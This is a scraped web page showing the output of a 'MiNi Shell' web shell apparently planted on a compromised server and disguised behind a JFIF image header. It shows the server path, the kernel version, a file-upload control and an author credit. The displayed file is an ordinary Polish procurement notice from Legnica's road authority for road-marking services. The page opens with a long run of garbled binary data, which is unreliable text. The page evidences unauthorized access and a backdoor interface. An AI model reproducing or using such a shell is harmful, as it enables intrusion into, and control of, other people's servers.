JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230427/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230427/0019459201-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Oznakowanie poziome&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zarząd Dróg Miejskich w Legnicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 390278090</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wojska Polskiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Legnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-220</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL516 - Legnicko-głogowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdm@zdm.legnica.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zdm.legnica.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Oznakowanie poziome&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5990d59f-e41a-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00194592</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00096296/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Oznakowanie poziome.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.platformazakupowa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie<br/>wersja 10 0.,<br/>4) włączona obsługa JavaScript,<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6) www.platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej- kodowanie UTF8,<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/> 24.7 Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem w zakładce „Instrukcje dla Wykonawców &#34; na www.platformazakupowa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DP/06/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Realizacja przedmiotu zamówienia polega na:<br/>- prawidłowym oznakowaniu miejsca robót znakami drogowymi odblaskowymi takimi jak A-12abc,A-14, B-25, B-27, B-33, C-9, C-10, C-11 i tablicami kierującymi U-21 ab, tablicami zamykającymi przewoźnymi U-26 (A-14), U-26 a,b,c, zaporami U-3ab (U-53), U-20-a,b, urządzenia bezpieczeństwa U-23-pachołki drogowe, lampami ostrzegawczymi żółtymi w ilościach odpowiednich do zakresu robót w danym dniu, montowanymi na odpowiednich słupkach zgodnie z Załącznikami do rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 w sprawie szczegółowych warunków technicznych do znaków i sygnałów drogowych oraz urządzeń i warunków umieszczania ich na drodze. (Dz.U. 2019 poz. 2311 z dn.09.09.b.r. z póź. zm.) Znaki i Urządzenia muszą być odblaskowe, folia typu drugiego ( dotyczy także pachołków drogowych).<br/>- wykonaniu na czystej nawierzchni oznakowania malowarkami hydrodynamicznymi ( z wymuszoną aplikacją mikrokul szklanych), którymi dysponuje Wykonawca, z wykorzystaniem pojazdów oraz urządzeń zabezpieczających. <br/>Wykonawca w trakcie realizacji zamówienia musi dysponować sprawną łącznością (telefony i e-mail) 7 dni w tygodniu dostępna dla Zamawiającego. Wykonawca jest zobowiązany do utrzymania w pełnej sprawności w/w kanałów łączności.<br/>Wykonawca zorganizuje tak realizację przedmiotu umowy, aby roboty były prowadzone na głównych ulicach miasta Legnicy przy najmniejszym możliwym natężeniu ruchu pieszych i pojazdów tj. w godz. wieczornych i nocnych, w dni powszednie po godz. 18,00 ( w szczególnych przypadkach później) do 6,00 dnia następnego oraz w dniach wolnych od pracy, w godzinach uzgodnionych z inspektorem nadzoru. W uzgodnieniu z Zamawiającym można wykonać roboty poza wyznaczonymi okresami.<br/>W ramach zadania w trybie interwencyjnym należy wykonać w terminie nie dłuższym niż 3 dni robocze od daty zgłoszenia przez Zamawiającego.<br/>W tym trybie (z zachowaniem powyższego terminu) należy również wykonać prace związane z oznakowaniem miejsc postojowych zastrzeżonych (przy współpracy z osobą zainteresowaną) oraz prace związane z oznakowaniem miejsc spowalniających ruch. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34922100-7 - Oznakowanie drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233221-4 - Malowanie nawierzchi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W związku z możliwością ograniczenia zakresu zamówienia poprzez zmniejszenie ilości i rodzajów zlecanych prac – w stosunku do przewidywanych ilości i rodzaju prac wskazanych w kosztorysie ofertowym – zgodnie z art. 433 pkt 4 u.p.z.p. Zamawiający ustala, że minimalna wartość umowy wynosi: 250 000,00 zł (brutto).<br/>18.7.	Zamawiający przewiduje opcję, polegającą na możliwości zwiększenia zakresu i ilości, a tym samym wartości zlecanych prac o 30% – w stosunku do ilości i zakresu podanych w kosztorysie ofertowym, a także wartości umowy, wskazanej w § 4 ust. 1 SWZ (Projekt umowy). <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-11-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 8.1.4.	zdolności technicznej lub zawodowej:<br/>Powyższy warunek zostanie spełniony, gdy Wykonawca wykaże, że:<br/>Wykonawca wykonał w okresie ostatnich 5 lat przed a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył, co najmniej: <br/>a) zamówienie lub zamówienia polegające na wykonaniu w miastach powyżej 90 tys. mieszkańców: <br/>- oznakowania poziomego cienkowarstwowego w ilości co najmniej 20.000,00 m2 łącznie, w tym, co najmniej jedno zamówienie w ilości minimum 10.000,00 m2 , <br/>- oznakowania poziomego grubowarstwowego w ilości co najmniej 1500,00 m2 łącznie, w tym, co najmniej jedno zamówienie w ilości minimum 100,00 m2 ;<br/> b) dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia, tj.:<br/> - minimum 1 samojezdna maszyna (malowarka automatyczna wyposażona w pistolety) do farb i mikrokulek do wykonywania linii segregacyjnych oznakowania poziomego cienkowarstwowego, <br/>- minimum 1 samojezdną maszyną do wykonywania linii segregacyjnych oznakowania poziomego grubowarstwowego, <br/>- minimum 1 stacjonarną maszyną do wykonywania linii przejść dla pieszych, pól martwych i innych drobnych elementów oznakowania poziomego cienkowarstwowego,<br/>- minimum 1 zestawem urządzeń lub narzędzi do wykonywania linii przejść dla pieszych, pól martwych i innych drobnych elementów oznakowania poziomego grubowarstwowego, <br/>- minimum 1 maszyną do aplikacji linii segregacyjnych, przejść dla pieszych, pól martwych i innych drobnych elementów oznakowania poziomego farbą chemoutwardzalną,<br/>-sprzęt do czyszczenia powierzchni z pyłu, kurzu piasku, olejów i innych zanieczyszczeń – 1 szt.<br/>- minimum 1 frezarką do usuwania oznakowania poziomego cienko i grubowarstwowego, bez naruszenia nawierzchni (bezinwazyjnie), <br/>- minimum 1 przyczepą do zabezpieczania robót na drogach o dużym natężeniu ruchu wyposażoną w oznakowanie z folii odblaskowej II lub III generacji, znaki C-9, C-10, A-14 z T-19 i zmienną strzałkę świetlną kierunkową (jeden zestaw/brygadę roboczą),<br/>- taśmy ostrzegawcze biało-czerwone ( 50mb/brygadę),<br/>- pachołki drogowe U-23a (50 szt./brygadę roboczą),<br/>-pojazd ze świetlnym przewoźnym zestawem do oznakowania robót 1 szt./brygadę roboczą,<br/>- tablice prowadzące ciągłe w prawo (lewo) U-3c (U-3d),<br/>- urządzenie umożliwiające wykonanie badań oznakowania poziomego (RL,QD,β), <br/>c) dysponuje osobami zdolnymi do wykonania zamówienia, tj.: personel:<br/>- kierownik robót - osoba z uprawnieniami budowlanymi w specjalności drogowej lub konstrukcyjno-budowlanej, wpisana na listę członków izby samorządu zawodowego zgodnie z zapisami rozdziału 2 ustawy Prawo budowlane z 07.07.1994 r. (t.j. Dz. U. z 2022r. z dnia 07.07.2022.r poz. 1557 z późn. zm.) oraz ubezpieczona od odpowiedzialności cywilnej za szkody, które mogą wyniknąć w związku z wykonywaniem ww. funkcji, posiadający aktualne zaświadczenie o wpisie na listę członków izby samorządu zawodowego i wymagane ubezpieczenie od odpowiedzialności cywilnej;<br/>- 2 osoby posiadające zaświadczenia o ukończeniu szkolenia z zakresu kierowania ruchem,<br/>- 2 osoby posiadające uprawnienia do obsługi sprzętu specjalistycznego do wykonywania oznakowania poziomego.<br/>- pracownicy fizyczni do prac związanych z wykonywaniem oznakowania poziomego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Dopuszczalne są zmiany zawartej umowy w zakresie uregulowanym w art. 454-455 ustawy Pzp.<br/>2.	Zgodnie z art. 455 ust. 1 pkt 1 ustawy Pzp, Zamawiający przewiduje możliwość zmiany postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie dotyczącym zmiany:<br/>1)	warunków wykonania umowy, w wyniku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem warunków ich wprowadzenia:<br/>a)	siły wyższej mającej bezpośredni, udokumentowany wpływ na realizację przedmiotu umowy – przy czym Wykonawca zobowiązany jest wykazać i uzasadnić w formie pisemnej, w sposób jednoznaczny i niebudzący wątpliwości, że siła wyższa miała wpływ na wykonywanie przez niego przedmiotu umowy,<br/>b)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy – w takiej sytuacji zapisy umowy zostaną dostosowane do obowiązującego stanu prawnego;<br/>2)	osób wyznaczonych przez Wykonawcę do realizacji przedmiotu umowy, wskazanych w § 2 ust. 4 i 5 , o ile nowe osoby realizujące przedmiot umowy posiadają wymagane uprawnienia.<br/>3.	Zmiana, o której mowa w ust. 2 pkt 2, może zostać wprowadzona do umowy na podstawie zaakceptowanego przez Zamawiającego pisemnego wniosku Wykonawcy, zawierającego uzasadnienie, albo na podstawie pisemnych zastrzeżeń Zamawiającego dotyczących osób realizujących przedmiot umowy, w następujących przypadkach:<br/>1)	śmierci, choroby lub innych zdarzeń losowych dotyczących osoby realizującej przedmiot umowy;<br/>2)	niewywiązywania się przez osobę realizującą przedmiot umowy z powierzonych obowiązków wynikających z umowy;<br/>3)	jeżeli zmiana osoby realizującej przedmiot umowy stanie się konieczna z przyczyn niezależnych od Wykonawcy.<br/>4.	Wprowadzenie innej osoby realizującej przedmiot umowy – w miejsce osoby dotychczas wykazanej w § 2 ust. 4 i 5 – będzie możliwe wyłącznie wtedy, gdy Wykonawca potwierdzi spełnianie<br/>przez tę osobę minimalnych wymagań określonych przez Zamawiającego w SWZ dla osób wykonujących prace, w szczególności przedstawiając Zamawiającemu potwierdzoną za zgodność z oryginałem kserokopię uprawnień dotyczących proponowanej nowej osoby – zgodnie z minimalnymi wymaganiami określonymi przez Zamawiającego w Specyfikacji Warunków Zamówienia. Osoba niespełniająca minimalnych wymagań Zamawiającego nie zostanie dopuszczona do wykonywania czynności w ramach niniejszej umowy, a Wykonawca zobowiązany będzie wskazać inną osobę, która wymagania te spełni.<br/>5.	Brak akceptacji przez Zamawiającego wniosku Wykonawcy, o którym mowa w ust. 3, uprawnia Zamawiającego do odstąpienia od umowy po bezskutecznym upływie dodatkowego terminu wyznaczonego przez Zamawiającego na wskazanie przez Wykonawcę innej osoby realizującej przedmiot umowy, spełniającej wymagania określone przez Zamawiającego w Specyfikacji Warunków Zamówienia i naliczenia Wykonawcy kary umownej, w wysokości 0,2% wynagrodzenia brutto określonego w § 4 ust. 2.<br/>6.	W przypadku kiedy wystąpienie którejkolwiek z okoliczności wymienionych w ust. 2 skutkować będzie zmianą powodującą modyfikację ogólnego charakteru umowy, wówczas nie przewiduje się wprowadzenia takiej zmiany.<br/>7.	Zmianie podlegają także wszelkie nieistotne postanowienia umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym m.in.:<br/>1)	zmiana osób prowadzących nadzór nad realizacją postanowień umowy – nie wymaga zawarcia aneksu do umowy;<br/>2)	zmiana danych związana z obsługą administracyjno-organizacyjną umowy (danych teleadresowych Wykonawcy i Zamawiającego) – następuje poprzez pisemne zgłoszenie tego faktu drugiej stronie i nie wymaga zawarcia aneksu do umowy.<br/>8.	Wszelkie zmiany i uzupełnienia umowy dokonane w sposób zgodny z ustawą Pzp wymagają formy pisemnej pod rygorem nieważności, tj. aneksu do umowy, z zastrzeżeniem przypadków, o których mowa w ust. 12.<br/>9.	Umowa może zostać zmieniona w przypadkach, o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-05-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-05-10 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com